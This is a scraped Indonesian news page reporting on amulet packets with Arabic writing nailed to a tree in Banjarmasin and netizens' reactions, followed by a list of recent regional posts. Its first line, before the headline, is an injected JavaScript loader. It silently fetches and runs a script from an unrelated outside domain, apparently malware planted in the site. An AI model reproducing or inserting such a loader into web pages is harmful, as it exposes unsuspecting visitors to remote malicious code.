(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Pohon Viral Penuh Jimat di Kawasan Siring 0 Km Banjarmasin, Ada Tulisan Arab


KANALKALIMANTAN.COM, BANJARMASIN – Viral menghebohkan netizen tempelan puluhan bungkusan plastik berwarna hitam yang tertancap pada sebuah pohon di kawasan Siring 0 Kilometer Banjarmasin.

Menariknya, di dalam bungkusan plastik kecil itu ternyata masing-masing berisi secarik kertas yang bertuliskan huruf Arab.

Kanalkalimantan.com, Kamis (20/4/2023) pagi, mencoba untuk melakukan pengecekan ke lokasi. Benar saja pada pohon yang dimaksud masih terdapat bungkusan plastik hitam yang ditempel dengan kuat menggunakan paku.

Tidak ada yang aneh dengan pohon yang mirip seperti beringin dengan tinggi menjulang sekitar 10 meter itu.

Baca juga: Layanan Samsat Banjarmasin II Libur Panjang, Buka Kembali 26 April 

 

Pohon yang terletak tepat di pinggir jalan Jenderal Sudirman atau tepat di pinggir aliran Sungai Martapura tersebut tumbuh rimbun dan nampak dahannya dililit oleh benalu.

Beragam komentar netizen pun tak bisa dibendung. Banyak komentar menggelitik dari netizen hingga mengaitkan dengan hal mistis.

Bahkan ada juga yang mengatakan bungkusan itu merupakan jimat yang digunakan sebagai penglaris dagangan.

Bukan tanpa alasan, nitizen beranggapan itu sebagai penglaris karena di Jalan Sudirman atau kawasan Siring 0 Kilometer tersebut baru saja dijadikan sebagai tempat Pasar Wadai Ramadhan.

“Seperti wafak jimat ya. Itu berisi ayat-ayat Al Qur’an tapi didalamnya ada diselipkan tulisan-tulisan Arab yang tidak dimengerti oleh orang awam. Biasa dipergunakan untuk penglaris, sihir, pengikat, tolak bala, dan sebagainya bagi yang mempercayainya. Dan hal itu jelas masuk dalam ranah kesyirikan,” tulis akun @muhi****.

Banyak juga netizen yang menyayangkan karena masih ada orang di Kota Banjarmasin yang masih mempercayai jimat-jimat semacam itu.

Baca juga: Gagalkan Dentuman di Malam Hari Raya, Polsek Astambul Tenggelamkan Dua Meriam Karbit

“Sangat mengherankan, padahal di Banjarmasin tempat pengajian ilmu agama sangat banyak. Masih ada aja manusia kaya itu berkelakuan,” tulis @aulia****.

“Ayo ini tugas bagian pertamanan Pemkot, untuk membersihkan biar pohonnya barasih wan nyaman (Baiman) hari pak wali,” tulis @mohammad_wa****. (Kanalkalimantan.com/rizki).

Reporter : rizki
Editor : bie


Risa

Recent Posts

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

34 menit ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

1 jam ago

Caleg Terpilih Tak Harus Mundur Jika Maju Pilkada, Begini Penjelasan Ketua KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Caleg Anggota Dewan Perwakilan Rakyat (DPR), Anggota Dewan Perwakilan Rakyat Daerah (DPRD)… Read More

3 jam ago

Lepas Keberangkatan 320 Calon Haji, Ini Pesan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bagian dalam dan luar halaman Mahligai Sultan Adam di Jalan A Yani… Read More

4 jam ago

Hari Ini Masuk Asrama Haji, Kloter 1 Embarkasi Banjarmasin Berangkat Minggu

KANALKALIMANTAN.COM, BANJARBARU - Jelang kedatangan rombongan jemaah Haji Embarkasi Banjarmasin Kloter 1, Sabtu (11/5/2024), Petugas… Read More

4 jam ago

Paman Birin Trophy VII 2024 Digelar 15 Hari di Murdjani

KANALKALIMANTAN.COM, BANJARBARU - Gubernur Kalimantan Selatan H Sahbirin Noor membuka secara resmi Paman Birin Trophy… Read More

6 jam ago

This website uses cookies.